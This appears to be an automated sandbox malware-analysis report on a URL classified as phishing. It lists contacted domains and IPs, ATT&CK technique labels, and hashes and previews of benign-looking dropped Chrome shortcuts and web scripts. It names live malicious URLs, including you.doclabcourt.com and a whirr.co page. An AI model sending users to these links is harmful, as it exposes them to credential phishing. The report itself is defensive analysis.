Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Extra Window Memory Injection
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://app.whirr.co/p/cm4711if90205nv0h2e4l0imu0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
stackpath.bootstrapcdn.com
104.18.11.207
truefalse
    high
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      cname.vercel-dns.com
      76.76.21.241
      truefalse
        high
        code.jquery.com
        151.101.66.137
        truefalse
          high
          cdnjs.cloudflare.com
          104.17.24.14
          truefalse
            high
            cos.na-siliconvalley.myqcloud.com
            170.106.97.195
            truefalse
              unknown
              challenges.cloudflare.com
              104.18.94.41
              truefalse
                high
                maxcdn.bootstrapcdn.com
                104.18.11.207
                truefalse
                  high
                  7509147325.lawyersfederalcourt.com
                  162.241.149.91
                  truefalse
                    high
                    www.google.com
                    142.250.185.100
                    truefalse
                      high
                      production-core.whirr.co
                      44.199.112.110
                      truefalse
                        unknown
                        you.doclabcourt.com
                        104.21.60.2
                        truetrue
                          unknown
                          7509147325-1323985617.cos.na-siliconvalley.myqcloud.com
                          unknown
                          unknownfalse
                            high
                            app.whirr.co
                            unknown
                            unknownfalse
                              unknown
                              NameMaliciousAntivirus DetectionReputation
                              https://app.whirr.co/p/cm4711if90205nv0h2e4l0imutrue
                                unknown
                                https://you.doclabcourt.com/OhgiN/true
                                  unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  142.250.185.99
                                  unknownUnited States
                                  15169GOOGLEUSfalse
                                  142.250.186.170
                                  unknownUnited States
                                  15169GOOGLEUSfalse
                                  104.18.10.207
                                  unknownUnited States
                                  13335CLOUDFLARENETUSfalse
                                  44.199.112.110
                                  production-core.whirr.coUnited States
                                  14618AMAZON-AESUSfalse
                                  104.18.94.41
                                  challenges.cloudflare.comUnited States
                                  13335CLOUDFLARENETUSfalse
                                  104.21.60.2
                                  you.doclabcourt.comUnited States
                                  13335CLOUDFLARENETUStrue
                                  142.250.185.100
                                  www.google.comUnited States
                                  15169GOOGLEUSfalse
                                  151.101.130.137
                                  unknownUnited States
                                  54113FASTLYUSfalse
                                  151.101.66.137
                                  code.jquery.comUnited States
                                  54113FASTLYUSfalse
                                  35.190.80.1
                                  a.nel.cloudflare.comUnited States
                                  15169GOOGLEUSfalse
                                  170.106.97.195
                                  cos.na-siliconvalley.myqcloud.comSingapore
                                  132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNfalse
                                  66.102.1.84
                                  unknownUnited States
                                  15169GOOGLEUSfalse
                                  142.250.184.195
                                  unknownUnited States
                                  15169GOOGLEUSfalse
                                  104.17.24.14
                                  cdnjs.cloudflare.comUnited States
                                  13335CLOUDFLARENETUSfalse
                                  1.1.1.1
                                  unknownAustralia
                                  13335CLOUDFLARENETUSfalse
                                  76.76.21.123
                                  unknownUnited States
                                  16509AMAZON-02USfalse
                                  76.76.21.241
                                  cname.vercel-dns.comUnited States
                                  16509AMAZON-02USfalse
                                  142.250.185.234
                                  unknownUnited States
                                  15169GOOGLEUSfalse
                                  142.250.185.110
                                  unknownUnited States
                                  15169GOOGLEUSfalse
                                  104.18.95.41
                                  unknownUnited States
                                  13335CLOUDFLARENETUSfalse
                                  142.250.185.138
                                  unknownUnited States
                                  15169GOOGLEUSfalse
                                  216.58.206.46
                                  unknownUnited States
                                  15169GOOGLEUSfalse
                                  104.18.11.207
                                  stackpath.bootstrapcdn.comUnited States
                                  13335CLOUDFLARENETUSfalse
                                  142.250.185.170
                                  unknownUnited States
                                  15169GOOGLEUSfalse
                                  239.255.255.250
                                  unknownReserved
                                  unknownunknownfalse
                                  162.241.149.91
                                  7509147325.lawyersfederalcourt.comUnited States
                                  46606UNIFIEDLAYER-AS-1USfalse
                                  172.217.16.195
                                  unknownUnited States
                                  15169GOOGLEUSfalse
                                  142.250.184.234
                                  unknownUnited States
                                  15169GOOGLEUSfalse
                                  IP
                                  192.168.2.17
                                  Joe Sandbox version:42.0.0 Malachite
                                  Analysis ID:1586966
                                  Start date and time:2025-01-09 19:58:53 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                  Sample URL:https://app.whirr.co/p/cm4711if90205nv0h2e4l0imu
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:20
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • EGA enabled
                                  Analysis Mode:stream
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal56.phis.win@20/54@46/272
                                  • Exclude process from analysis (whitelisted): TextInputHost.exe
                                  • Excluded IPs from analysis (whitelisted): 142.250.184.195, 66.102.1.84, 216.58.206.46, 216.58.206.78, 142.250.186.170, 172.217.16.195, 142.250.185.206
                                  • Excluded domains from analysis (whitelisted): fonts.googleapis.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, fonts.gstatic.com, clientservices.googleapis.com, clients.l.google.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • VT rate limit hit for: https://app.whirr.co/p/cm4711if90205nv0h2e4l0imu
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 9 17:59:23 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                  Category:dropped
                                  Size (bytes):2677
                                  Entropy (8bit):3.993292106168992
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:79C99D813E274037BDE13F3F8EB307E9
                                  SHA1:54B70CB91C2358AE1B36CE0F85D9D4588A4E4B96
                                  SHA-256:CD2ACFDBEFCCD80668490999C262C86DF2A6CCEC1E389BA2E6981F056AFB0BAE
                                  SHA-512:F74AF5DCF3B8637AACEEB400ED6752E66E6E7EAF12E1ED0582E655D4B23427C0FC99392D208CC477985E20605D262370599AD54E0527EF216C9104F6536EC550
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:L..................F.@.. ...$+.,.........b......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I)Zd.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V)Zj.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V)Zj.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V)Zj............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V)Zl............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............I......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 9 17:59:22 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                  Category:dropped
                                  Size (bytes):2679
                                  Entropy (8bit):4.006853765747307
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:4FC6241C0522D2CCB7DB084D5F9A4A9A
                                  SHA1:05313CE7EB06A1099D1F887BD21DAB97207CD371
                                  SHA-256:50D73D91F1DCCB871E8E4A6A4CD217A172ABB69371EFC1A1F78D47757ECA699A
                                  SHA-512:05FA9A7A29EDE4F8504F57C5678051BEB962E241A0B544C2A3E7BA8AF74F940F5B97F73B7AEAA780A8453F78638E75420BDEB9746CD52C2EE77355E8B8619D23
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:L..................F.@.. ...$+.,.......b......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I)Zd.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V)Zj.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V)Zj.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V)Zj............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V)Zl............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............I......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                  Category:dropped
                                  Size (bytes):2693
                                  Entropy (8bit):4.019475780509843
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:5D02385A2B2A22AB12152C5CB3E0762F
                                  SHA1:FEAEEA0528A02F975366D550BB407DDD86D6E6F1
                                  SHA-256:637ADFAEB32528D1471DE005710D4B4A5C648E7822D27833FAC1897C12E95E2E
                                  SHA-512:D76027DC32A7E949791F7C42BCF52977754DB665AC3D804BC560067A30FD466468418AAFBC5BE12705F08DB50858D45FFF17E8069C59FF2906878F135533E438
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I)Zd.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V)Zj.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V)Zj.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V)Zj............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............I......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 9 17:59:22 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                  Category:dropped
                                  Size (bytes):2681
                                  Entropy (8bit):4.006788903088263
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:EE1AA56EA7094C6A389D0CFB70046305
                                  SHA1:1B7B57C4A6456B419C86052B844445B1ECBE610D
                                  SHA-256:6D0AC2A7CA2ED7F16C38618660EDD8D74C1C2ABD6257B2F6BA541CCB8CA36034
                                  SHA-512:DFBAE5852CDD0F1C19507EEBCE1BEA25A063E4F11052EC2AB1B79867067A89F005E02965312E7D651B7A660B310E5E5FDA694BA78CE4C254CFEC069A535068C1
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:L..................F.@.. ...$+.,.........b......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I)Zd.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V)Zj.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V)Zj.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V)Zj............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V)Zl............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............I......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 9 17:59:23 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                  Category:dropped
                                  Size (bytes):2681
                                  Entropy (8bit):3.9961604677729885
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:B263A67DF6B30189067F925853122C36
                                  SHA1:345669D021E3D3EBBDD268C561111F19787BEDEF
                                  SHA-256:0C4C8C5C075D0D561452B88837C5C87D0F623E81884610B5C626EFD11950A5AA
                                  SHA-512:B72877E851F960A6C2C62EF4F5B7AE0BB2E0CF0A677CC7B3BDB42EA0C919BCB29ADC4957E02A48A75F9B46C37FFB3A990E7C3B4AFB12F3312A1F192B6A7C0E25
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:L..................F.@.. ...$+.,.....U...b......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I)Zd.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V)Zj.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V)Zj.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V)Zj............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V)Zl............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............I......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 9 17:59:22 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                  Category:dropped
                                  Size (bytes):2683
                                  Entropy (8bit):4.008158411085319
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:6AD859C77358D322621DDDC033BE95F0
                                  SHA1:7592006299F87479B71C1256FC2D5BEA8ACA1DCD
                                  SHA-256:6B611A8E0B3B6C1914349D3FAD38EB1A8BC5277DE343E919E38289439A8D5190
                                  SHA-512:6989F608B3B117842B8A6F93DB57516199EF097837D7F32E714C4E5CD48A0DAC894887CBEEC8054583633104C5091623E72D0197A73F418D7405CEDBF3508E91
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:L..................F.@.. ...$+.,.....iy..b......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I)Zd.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V)Zj.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V)Zj.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V)Zj............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V)Zl............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............I......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                  Category:dropped
                                  Size (bytes):125803
                                  Entropy (8bit):5.38363667067452
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:5BBC2F6D973C2277544F4474B47EADD8
                                  SHA1:F39A35A42F6688C13402F386ABBC8622E0961A97
                                  SHA-256:4B1F96DBFDB3700133EF1B2687917EDEAEE58A5E369D43222036855E62A3B736
                                  SHA-512:2F9EA3112732F0BC462A10F9D89FF67A886B4037EE29C7DD406D6F59351F99805DC55B0781C61D6BAB7212BB2AA0CD2B474CE2BC307EF453F61694B846AE97AC
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{33482:function(e,t){"use strict";function r(){return""}Object.defineProperty(t,"__esModule",{value:!0}),Object.defineProperty(t,"getDeploymentIdQueryOrEmptyString",{enumerable:!0,get:function(){return r}})},27658:function(){"trimStart"in String.prototype||(String.prototype.trimStart=String.prototype.trimLeft),"trimEnd"in String.prototype||(String.prototype.trimEnd=String.prototype.trimRight),"description"in Symbol.prototype||Object.defineProperty(Symbol.prototype,"description",{configurable:!0,get:function(){var e=/\((.*)\)/.exec(this.toString());return e?e[1]:void 0}}),Array.prototype.flat||(Array.prototype.flat=function(e,t){return t=this.concat.apply([],this),e>1&&t.some(Array.isArray)?t.flat(e-1):t},Array.prototype.flatMap=function(e,t){return this.map(e,t).flat()}),Promise.prototype.finally||(Promise.prototype.finally=function(e){if("function"!=typeof e)return this.then(e,e);var t=this.constructor||Promise;return this.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (38757)
                                  Category:dropped
                                  Size (bytes):138008
                                  Entropy (8bit):5.280474839509831
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:92A14586464B8EB2AD2004A304F36BF8
                                  SHA1:2937C4628705DA16CC1836BB0D8AEB6A9091F545
                                  SHA-256:582782ED0B7718404969584F4C4F246969666078CA8756DD299439E4D7EBA5E6
                                  SHA-512:225CCFE0D4D2DFF989EE54922A4E5E0972D6C1FB2B762480FC5B1E1AAEC42C8D5F6FC0DF166548E5D50ACD1CC5C8F16541D12669B2432D9C8BC204AE6A2294DF
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2888],{89483:function(t,e,n){"use strict";var r=n(35837),i={childContextTypes:!0,contextType:!0,contextTypes:!0,defaultProps:!0,displayName:!0,getDefaultProps:!0,getDerivedStateFromError:!0,getDerivedStateFromProps:!0,mixins:!0,propTypes:!0,type:!0},s={name:!0,length:!0,prototype:!0,caller:!0,callee:!0,arguments:!0,arity:!0},o={$$typeof:!0,compare:!0,defaultProps:!0,displayName:!0,propTypes:!0,type:!0},a={};function c(t){return r.isMemo(t)?o:a[t.$$typeof]||i}a[r.ForwardRef]={$$typeof:!0,render:!0,defaultProps:!0,displayName:!0,propTypes:!0},a[r.Memo]=o;var u=Object.defineProperty,l=Object.getOwnPropertyNames,p=Object.getOwnPropertySymbols,d=Object.getOwnPropertyDescriptor,h=Object.getPrototypeOf,f=Object.prototype;t.exports=function t(e,n,r){if("string"!=typeof n){if(f){var i=h(n);i&&i!==f&&t(e,i,r)}var o=l(n);p&&(o=o.concat(p(n)));for(var a=c(e),g=c(n),m=0;m<o.length;++m){var _=o[m];if(!s[_]&&!(r&&r[_])&&!(g&&g[_])&&!(a&&a[_])){
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                  Category:downloaded
                                  Size (bytes):140040
                                  Entropy (8bit):5.264503370427121
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:A4DCB17EA1FFB6ECA7AC2BDADDFA14CF
                                  SHA1:CE3EF766665E9905EA7AF4E3AB6A4BE0F6F12C4B
                                  SHA-256:F4CC543619C10517C004E33FB0F2375325D6CC8F79B221AB367495B052C849F8
                                  SHA-512:C556C65DAD33E9BA39354E6036F1E6BEE634E18EDA235694DA39129D4BBE66AFCBCB0A3C93DE512A3EC20549239DC06E08D39E775D6FEA20DC0248FF2691BF0F
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://app.whirr.co/_next/static/chunks/framework-64445a75a6acca8a.js
                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9774],{64534:function(e,n,t){var r,l,a,u,o,i,s=t(82684),c=t(26756);function f(e){for(var n="https://reactjs.org/docs/error-decoder.html?invariant="+e,t=1;t<arguments.length;t++)n+="&args[]="+encodeURIComponent(arguments[t]);return"Minified React error #"+e+"; visit "+n+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var d=new Set,p={};function m(e,n){h(e,n),h(e+"Capture",n)}function h(e,n){for(p[e]=n,e=0;e<n.length;e++)d.add(n[e])}var g=!("undefined"==typeof window||void 0===window.document||void 0===window.document.createElement),v=Object.prototype.hasOwnProperty,y=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD][:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFD
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (64640)
                                  Category:downloaded
                                  Size (bytes):274360
                                  Entropy (8bit):5.123110652742667
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:3584C7C331DCC9D29F5A9D46B0B4C9E9
                                  SHA1:B5A4B32F4C081887ACEE620F082629C1B24E77BA
                                  SHA-256:88C519A37DC81EAE9FFBCA0069CF693AA4939559EB692176D2B2D882F63DD621
                                  SHA-512:EBC9047069A66D3843BA28EACE17E08F6E80CEE8E010936C970197142AB0127F5F71242CD65FA2E8DC25D908544D8043B0BD1AF2340D38CB69421F75E86115F7
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://app.whirr.co/_next/static/css/9a725bc2e6d505ce.css
                                  Preview:#nprogress{pointer-events:none}#nprogress .bar{background:#29d;position:fixed;z-index:1031;top:0;left:0;width:100%;height:2px}#nprogress .peg{display:block;position:absolute;right:0;width:100px;height:100%;box-shadow:0 0 10px #29d,0 0 5px #29d;opacity:1;transform:rotate(3deg) translateY(-4px)}#nprogress .spinner{display:block;position:fixed;z-index:1031;top:15px;right:15px}#nprogress .spinner-icon{width:18px;height:18px;box-sizing:border-box;border-color:#29d #0000 #0000 #29d;border-style:solid;border-width:2px;border-radius:50%;animation:nprogress-spinner .4s linear infinite}.nprogress-custom-parent{overflow:hidden;position:relative}.nprogress-custom-parent #nprogress .bar,.nprogress-custom-parent #nprogress .spinner{position:absolute}@keyframes nprogress-spinner{0%{transform:rotate(0deg)}to{transform:rotate(1turn)}}.../*.! tailwindcss v3.2.7 | MIT License | https://tailwindcss.com.*/*,:after,:before{box-sizing:border-box;border:0 solid}:after,:before{--tw-content:""}html{line-height:
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (18068), with no line terminators
                                  Category:dropped
                                  Size (bytes):18068
                                  Entropy (8bit):5.441936355754401
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:6F55B15652D08767CF359E8656AE0F32
                                  SHA1:C25C78FA6C8BD9D7A2BBB23538ADA64DCE2F3D15
                                  SHA-256:67774E434F3DFBEBB146AA356155CDF242C028DFA7FF024B0568F2771D7555D7
                                  SHA-512:B66D2E7BC704148F372C081200F60B94D02C397AD601690DB9E26077C1BCBDBF5C38F4EB5526D3D00F54FC03529ABBF60E08BCAA34CAF986A3CA56B8E0352DDC
                                  Malicious:false
                                  Reputation:unknown
